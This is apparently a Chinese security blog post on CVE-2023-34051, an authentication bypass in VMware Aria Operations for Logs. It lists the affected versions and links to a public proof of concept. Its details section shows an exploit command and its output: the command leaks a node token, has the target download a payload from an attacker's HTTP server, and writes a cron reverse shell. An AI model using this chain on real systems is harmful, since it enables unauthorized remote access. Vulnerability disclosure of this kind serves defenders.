CVE-2023-34051｜VMware Aria Operations for Logs身份验证绕过漏洞

admin

102523
文章

87
评论

2023年10月27日01:09:18评论35 views字数 1373阅读4分34秒阅读模式

0x00 前言

VMware Aria Operations for Logs（以前称为 vRealize Log Insight）是一款日志分析工具，可提供高度可扩展的异构日志管理功能，具备直观且可操作的仪表板、精细的分析功能和广泛的第三方扩展功能。

0x01 漏洞描述

该漏洞源于VMware vRealize Log Insight中对先前发布的VMSA-2023-0001中的多个漏洞修复不足（仅阻止通过IP访问Thrift 服务），导致存在绕过VMSA-2023-0001补丁的身份验证绕过方法。

0x02 CVE编号

CVE-2023-34051

0x03 影响版本

VMware Aria Operations for Logs 8.x < 8.14VMware Cloud Foundation (VMware Aria Operations for Logs) 5.x、4.x

0x04 漏洞详情

$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit [+] Using CVE-2022-31711 to leak node token[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8[+] Using CVE-2022-31704 to trigger malicious file download192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -[+] File successfully downloaded[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell[+] Payload successfully delivered

0x05 参考链接

https://github.com/horizon3ai/CVE-2023-34051

https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive-and-iocs/

CVE-2023-34051｜VMware Aria Operations for Logs身份验证绕过漏洞

记一次有源码的渗透测试

经典：“红日三”服务器群靶机

Google如何利用生成式AI加速事件响应流程

Hack The Box-start point-Archetype笔记

使用 Burp 枚举 REST API

fastjson-BCEL不出网打法原理分析

改变content-type类型所触发的csrf

【OSCP】vivifytech

从零开始的Kubernetes攻防

一次js混淆测试记录

发表评论